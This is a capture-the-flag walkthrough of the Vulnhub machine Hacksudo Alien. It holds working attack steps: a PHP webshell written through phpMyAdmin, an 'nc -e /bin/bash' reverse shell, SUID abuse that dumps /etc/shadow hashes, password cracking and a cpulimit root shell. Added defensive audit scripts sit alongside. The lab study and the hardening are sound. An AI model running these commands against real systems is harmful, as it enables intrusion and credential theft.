Vulnhub: Hacksudo Alien Walkthrough

Hacksudo Alien

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Alien]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.80.0/16   |   Screen View: Unique Hosts                                                         
                                                                                                                             
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                            
 192.168.56.100  08:00:27:96:d2:34      1      60  PCS Systemtechnik GmbH                                                    
 192.168.56.214  08:00:27:3e:9d:6a      1      60  PCS Systemtechnik GmbH                                                    


Using the netdiscover tool bundled with Kali Linux, the target host's IP address was identified as 192.168.56.214.

NMAP Scan

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Alien]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.214 -oN nmap_full-scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-23 06:33 EST
Nmap scan report for localhost (192.168.56.214)
Host is up (0.00023s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 31:d8:56:f4:cf:8b:09:e8:a1:5e:2e:dd:ac:08:6b:dd (RSA)
|   256 cd:65:ec:9e:d0:2c:6b:4e:02:40:c3:fd:01:5d:d1:87 (ECDSA)
|_  256 03:00:28:0e:0b:da:12:68:c3:c5:45:ab:bb:92:92:fa (ED25519)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Hacksudo Alien?
9000/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: phpMyAdmin
MAC Address: 08:00:27:3E:9D:6A (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.89 seconds

The NMAP scan shows that the target host has three open ports: 22 (SSH), 80 (HTTP) and 9000 (HTTP).

Get Access

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Alien]
└─$ curl http://192.168.56.214                                                       
<!DOCTYPE html>
<html lang="en-us">
<head>
        <head>
                <meta charset="utf-8">
                <meta name="viewport" content="width=device-width, initial-scale=1.0">
                <link rel="icon" type="image/x-icon" href="favicon.ico">
                <link rel="stylesheet" type="text/css" href="style.css">
                <title>Hacksudo Alien?</title>
        </head>

        <body>
        <div class="TitleWrapper Title">HACKSUDO Alien Sightings<div class="Hacker"></div></div>

        <div class="ContentWrapper">author - vishal waghmare </div>

    <meta charset="UTF-8">
    <title>Hacksudo:Alien</title>
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
    <link rel="stylesheet" href="style.css">
</head>

<body >
    <div class = "text-danger">
        <div class = "jumbotron text-center">
            <h1><strong>Aliens R Real - HackSudo</strong></h1>
            <h2><em>Alien Sightings Data by vishal waghmare</em></h2>
        </div>
    </div>
    <div class = "text-danger">
        <div class = "text-danger">
            <div class = "col-md-4" style = "margin-left:-50px">
            <div class = "form-group">
                <input type = "text" class = "form-control" id = "date_time" placeholder = "Enter Search Date (m/d/yyyy)">
                <a id = "search" class = "btn btn-default">Search</a>
            </div>
        </div>
    </div>

    <div class = "row">
        <div class = "col-md-12" id = "tsizing">
            <table class = "table table-striped">
                <thead>
                    <tr>
                        <th>Date</th>
                        <th>City</th>
                        <th>State</th>
                        <th>Country</th>
                        <th>Shape</th>
                        <th>Duration</th>
                        <th id="comment-width">Comments</th>
                    </tr>
                </thead>
                <tbody></tbody>
            </table>
        </div>
        </div>
    </div>
    <script src = "data.js" type = "text/javascript"></script>
    <script src = "alien.js" type = "text/javascript"></script>
</body>
</html>

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Alien]
└─$ nikto -h http://192.168.56.214                            
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.214
+ Target Hostname:    192.168.56.214
+ Target Port:        80
+ Start Time:         2022-11-23 06:40:41 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 8b1, size: 5bf1f4b58ff9d, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ OSVDB-3268: /backup/: Directory indexing found.
+ OSVDB-3092: /backup/: This might be interesting...
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7916 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2022-11-23 06:41:30 (GMT-5) (49 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to sullo@cirt.net) (y/n)? 

Nikto found the /backup directory; browsing it reveals a MySQL backup file.

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Alien]
└─$ mv ~/Downloads/mysql.bak .                                 
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Alien]
└─$ ls
mysql.bak  nmap_full-scan

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Alien]
└─$ cat mysql.bak                     
#!/bin/bash

# Specify which database is to be backed up
db_name=""

# Set the website which this database relates to
website="localhost"

# Database credentials
user="vishal"
password="hacksudo"
host="localhost"

# How many days would you like to keep files for?
days="30"

######################################################
##### EDITING BELOW MAY CAUSE UNEXPECTED RESULTS #####
######################################################

# Set the date
date=$(date +"%Y%m%d-%H%M")

# Set the location of where backups will be stored
backup_location="/var/backups/mysql"

# Create the directory for the website if it doesn't already exist
mkdir -p ${backup_location}/${website}
# Append the database name with the date to the backup location
backup_full_name="${backup_location}/${website}/${db_name}-${date}.sql"

# Set default file permissions
umask 177

# Dump database into SQL file
mysqldump --lock-tables --user=$user --password=$password --host=$host $db_name > $backup_full_name

# Set a value to be used to find all backups with the same name
find_backup_name="${backup_location}/${website}/${db_name}-*.sql"
# Delete files older than the number of days defined
find $find_backup_name -mtime +$days -type f -delete
                                                          

The backup file contains a database username and password. Trying them against phpMyAdmin on port 9000 succeeds. While at it, check whether they can also be used for SSH.

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Alien]
└─$ ssh vishal@192.168.56.214                                  
The authenticity of host '192.168.56.214 (192.168.56.214)' can't be established.
ED25519 key fingerprint is SHA256:XUlS4R9GczG8s3rLmHyLIacottCV5nGnO/wvGzLMtXQ.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.214' (ED25519) to the list of known hosts.
vishal@192.168.56.214's password: 
Permission denied, please try again.
vishal@192.168.56.214's password: 
Permission denied, please try again.
vishal@192.168.56.214's password: 
                                                

So the database credentials cannot be used for SSH.
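The backup script above carries a literal database password in a world-readable file that ended up in a web-served, index-enabled /backup/ directory. As an added example (not code from the original post), the helpers below audit a backup script for exactly that pattern and for a dump location under the web root, and show the hardened way to pass credentials: a mode-600 option file handed to mysqldump's real --defaults-extra-file flag. The function names, the web-root prefixes and the sample values are my own assumptions.

```shell
#!/bin/sh
# Added example, not from the original post.
# Audit helpers for backup scripts like mysql.bak: plaintext credentials,
# web-exposed backup locations, and a hardened way to pass DB credentials.

# Print any line that assigns a literal, non-empty password
# (password=, passwd=, pass=). Exit 0 if something was found, 1 if clean.
find_plaintext_creds() {
    pat="^[[:blank:]]*(password|passwd|pass)[[:blank:]]*=[[:blank:]]*[\"']?[^\"' ]+"
    grep -nEi -- "$pat" "$1"
}

# Return 0 if a path lies inside a directory typically served over HTTP.
# (Assumed prefixes; extend for your own document roots.)
under_webroot() {
    case "$1" in
        /var/www/*|/srv/www/*|/srv/http/*|/usr/share/nginx/html/*) return 0 ;;
        *) return 1 ;;
    esac
}

# Hardened credential handling: write a mode-600 option file once, then let
# the backup script run
#     mysqldump --defaults-extra-file="$optfile" --lock-tables "$db_name"
# so no password appears in the script body or in the process list.
write_mysql_option_file() {
    optfile=$1 user=$2 password=$3
    ( umask 077
      printf '[client]\nuser=%s\npassword=%s\nhost=localhost\n' \
          "$user" "$password" > "$optfile" )
}

# Combined audit of one backup script: report both findings, return 1 if any.
audit_backup_script() {
    rc=0
    if creds=$(find_plaintext_creds "$1"); then
        echo "plaintext credentials in $1:"; echo "$creds"; rc=1
    fi
    # Pull the value of backup_location="..." (first occurrence).
    loc=$(sed -n 's/^[[:blank:]]*backup_location="\{0,1\}\([^"]*\)"\{0,1\}.*/\1/p' "$1" | head -n 1)
    if [ -n "$loc" ] && under_webroot "$loc/"; then
        echo "backup_location $loc is inside a web root"; rc=1
    fi
    return $rc
}
```

Run `audit_backup_script /path/to/mysql.bak` against the script as found and it reports the embedded password; after switching to the option file and a location such as /var/backups/mysql (which the script itself already uses, the exposure here came from the copy in /backup/), it returns clean.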

Writing a webshell through phpMyAdmin

Execute the following in the phpMyAdmin SQL tab:

SELECT '<HTML><BODY><FORM METHOD="GET" NAME="myform" ACTION=""><INPUT TYPE="text" NAME="cmd"><INPUT TYPE="submit" VALUE="Send"></FORM><pre><?php if($_GET["cmd"]) {system($_GET["cmd"]);} ?> </pre></BODY></HTML>' INTO OUTFILE '/var/www/html/huawen.php'

Then access it on port 80 (not port 9000).

Then use the webshell to spawn a shell.

Enter in the input box: nc -e /bin/bash 192.168.56.206 5555

Kali Linux successfully receives the reverse shell from the target host.

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Alien]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.214] 44288
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@hacksudo:/var/www/html$ 
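The INTO OUTFILE step above can only succeed when the database account holds the FILE privilege, the mysqld process can write to /var/www/html, and secure_file_priv does not confine exports. As an added example (not the post's code), the shell function below reads a MySQL/MariaDB option file and reports how secure_file_priv is set, so the weak setting (empty) can be told apart from the corrected one (a dedicated directory, or NULL to disable file import/export). The section names it scans and the status strings are my own choices; the note that an unset value means unrestricted applies to MariaDB, whose compiled-in default is empty.

```shell
#!/bin/sh
# Added example, not from the original post.
# Report how secure_file_priv is configured in a MySQL/MariaDB option file.
# Scans the [mysqld], [server] and [mariadb] sections and accepts both
# spellings (secure_file_priv / secure-file-priv), as the server does.
secure_file_priv_status() {
    awk '
        /^[ \t]*\[/ { in_srv = ($0 ~ /^[ \t]*\[(mysqld|server|mariadb)\]/); next }
        in_srv && $0 ~ /^[ \t]*secure[_-]file[_-]priv[ \t]*=/ {
            sub(/^[^=]*=[ \t]*/, "")        # drop the "key =" part
            sub(/[ \t]*(#.*)?$/, "")        # drop trailing comment and blanks
            gsub(/^"|"$/, "")               # strip surrounding double quotes
            val = $0; found = 1
        }
        END {
            if (!found)                      print "unset (server default applies; empty, i.e. unrestricted, on MariaDB)"
            else if (val == "")              print "disabled (empty: mysqld may read/write any path it has access to)"
            else if (toupper(val) == "NULL") print "off (LOAD DATA and SELECT ... INTO OUTFILE refused)"
            else                             print "restricted:" val
        }
    ' "$1"
}

# Convenience check: exit 0 only when exports are confined to a directory
# or disabled outright.
secure_file_priv_is_safe() {
    case "$(secure_file_priv_status "$1")" in
        restricted:*|off*) return 0 ;;
        *) return 1 ;;
    esac
}
```

Usage: `secure_file_priv_is_safe /etc/mysql/mariadb.conf.d/50-server.cnf || echo "exports unconfined"`. The config check is only one leg; pair it with `SHOW GRANTS` for the application account (revoke FILE if it is not needed) and `ls -ld /var/www/html` to confirm the mysql system user cannot write there.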

Privilege Escalation

Upload the linpeas.sh script to the target host's /tmp directory, make it executable, and run it.

It reveals that the date command has the SUID bit set.

ls -alh /usr/bin/date
---Sr-xr-x 1 root root 107K Feb 28  2019 /usr/bin/date

Following the GTFOBins method, this can read any file; let's read out the /etc/shadow file.

www-data@hacksudo:/tmp$ /usr/bin/date -f /etc/shadow
/usr/bin/date -f /etc/shadow
/usr/bin/date: invalid date 'root:$6$N6p.dpWhPYXSXC9U$8EraUiQ5DtMF5ov2ZbnY8DoLK1liRukqhTnTTK67MQ.tgpglkVX/I9P1aYjNeO/cwjQk9lJ/ABd9YLTMeMSn3/:18721:0:99999:7:::'
/usr/bin/date: invalid date 'daemon:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'bin:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'sys:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'sync:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'games:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'man:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'lp:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'mail:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'news:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'uucp:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'proxy:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'www-data:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'backup:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'list:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'irc:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'gnats:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'nobody:*:18714:0:99999:7:::'
/usr/bin/date: invalid date '_apt:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'systemd-timesync:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'systemd-network:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'systemd-resolve:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'messagebus:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'tss:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'dnsmasq:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'usbmux:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'rtkit:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'pulse:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'speech-dispatcher:!:18714:0:99999:7:::'
/usr/bin/date: invalid date 'avahi:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'saned:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'colord:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'geoclue:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'hplip:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'Debian-gdm:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'hacksudo:$6$cOv4E/VKAe0EVwV4$YScCx10zfi7g4aiLY.qo8QPm2iOogJea41mk2rGk/0JM5AtnrmiyTN5ctNJ0KTLS5Iru4lHWYPug792u3L/Um1:18721:0:99999:7:::'
/usr/bin/date: invalid date 'systemd-coredump:!!:18714::::::'
/usr/bin/date: invalid date 'sshd:*:18714:0:99999:7:::'
/usr/bin/date: invalid date 'mysql:!:18720:0:99999:7:::'
www-data@hacksudo:/tmp$ 

This yields the password hashes of root and hacksudo.

John successfully cracked hacksudo's password.

┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Alien]
└─$ john hacksudo_hash /usr/share/wordlists/rockyou.txt 

Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
aliens           (hacksudo)     
1g 0:00:00:01 DONE 2/3 (2022-11-23 07:52) 0.6849g/s 2951p/s 2951c/s 2951C/s rangers..burton
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 


┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Alien]
└─$ ssh hacksudo@192.168.56.214
hacksudo@192.168.56.214's password: 
Linux hacksudo 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Apr  4 02:12:24 2021 from 192.168.43.217
hacksudo@hacksudo:~$ id
uid=1000(hacksudo) gid=1000(hacksudo) groups=1000(hacksudo),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth),116(lpadmin),117(scanner)
hacksudo@hacksudo:~$ sudo -l
[sudo] password for hacksudo: 
Sorry, user hacksudo may not run sudo on hacksudo.
hacksudo@hacksudo:~$ 

hacksudo@hacksudo:~$ find / -perm -4000 -type f 2>/dev/null
/home/hacksudo/Downloads/cpulimit
/usr/bin/date
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/ntfs-3g
/usr/bin/bwrap
/usr/bin/sudo
/usr/lib/xorg/Xorg.wrap
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/pppd
hacksudo@hacksudo:~$ 
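Both footholds in this section, the set-uid date used to read /etc/shadow and the set-uid cpulimit sitting in a home directory, would stand out in a plain baseline comparison. The following is an added example, not from the original post: a shell filter that takes the output of the `find / -perm -4000 -type f` command above and prints only entries that are outside a known-good list or located in a user-writable tree. The baseline list is an assumption built from the stock Debian 10 entries in that output; regenerate it from a clean image before relying on it.

```shell
#!/bin/sh
# Added example, not from the original post.
# Usage on a host:  find / -perm -4000 -type f 2>/dev/null | suid_unexpected

# Assumed baseline: set-uid binaries present on a stock Debian 10 desktop,
# taken from the walkthrough's find output minus the two planted ones.
SUID_BASELINE='
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/ntfs-3g
/usr/bin/bwrap
/usr/bin/sudo
/usr/lib/xorg/Xorg.wrap
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/pppd
'

# True when $1 appears as a whole line in the baseline (-x: exact line, -F: literal).
in_baseline() {
    printf '%s\n' "$SUID_BASELINE" | grep -Fxq -- "$1"
}

# True when $1 is under a tree that unprivileged users can write to;
# a set-uid binary there is never legitimate.
in_user_writable_tree() {
    case "$1" in
        /home/*|/tmp/*|/var/tmp/*|/dev/shm/*) return 0 ;;
        *) return 1 ;;
    esac
}

# Read set-uid paths on stdin; print one line per suspicious entry with a reason.
suid_unexpected() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        if in_user_writable_tree "$path"; then
            echo "$path  set-uid binary in a user-writable tree"
        elif ! in_baseline "$path"; then
            echo "$path  not in baseline"
        fi
    done
}
```

Fed the 22 paths from the find output above, the filter reports exactly two lines: /usr/bin/date (not in baseline) and /home/hacksudo/Downloads/cpulimit (user-writable tree). The same check runs well as a periodic job whose output is diffed against the previous run.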

Following the GTFOBins method, escalate privileges with the cpulimit command.

hacksudo@hacksudo:~$ ls
aliens51  Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos
hacksudo@hacksudo:~$ pwd
/home/hacksudo
hacksudo@hacksudo:~$ cd Downloads/
hacksudo@hacksudo:~/Downloads$ ls
cat  chown  cpulimit  hexdump
hacksudo@hacksudo:~/Downloads$ ./cpulimit -l 100 -f -- /bin/sh -p
Process 22494 detected
# id
uid=1000(hacksudo) gid=1000(hacksudo) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth),116(lpadmin),117(scanner),1000(hacksudo)
# cd /root
# ls -alh
total 40K
drwx------  4 root root 4.0K Apr  4  2021 .
drwxr-xr-x 19 root root 4.0K Apr  3  2021 ..
-rw-------  1 root root 1.7K Apr  3  2021 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwx------  2 root root 4.0K Mar 28  2021 .cache
drwxr-xr-x  3 root root 4.0K Apr  3  2021 .local
-rw-------  1 root root 1.1K Apr  3  2021 .mysql_history
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-r--------  1 root root  552 Apr  4  2021 root.txt
-rw-r--r--  1 root root  227 Apr  3  2021 .wget-hsts
# cat root.txt
 _   _            _                  _       
| | | | __ _  ___| | _____ _   _  __| | ___  
| |_| |/ _` |/ __| |/ / __| | | |/ _` |/ _ \ 
|  _  | (_| | (__|   <\__ \ |_| | (_| | (_) |
|_| |_|\__,_|\___|_|\_\___/\__,_|\__,_|\___/ 
                                             
    _    _ _            ____   __   
   / \  | (_) ___ _ __ | ___| / /_  
  / _ \ | | |/ _ \ '_ \|___ \| '_ \ 
 / ___ \| | |  __/ | | |___) | (_) |
/_/   \_\_|_|\___|_| |_|____/ \___/ 

congratulations you rooted hacksudo alien56...!!!
flag={d045e6f9feb79e94442213f9d008ac48}
# 

posted @ 2022-11-23 21:03  Jason_huawen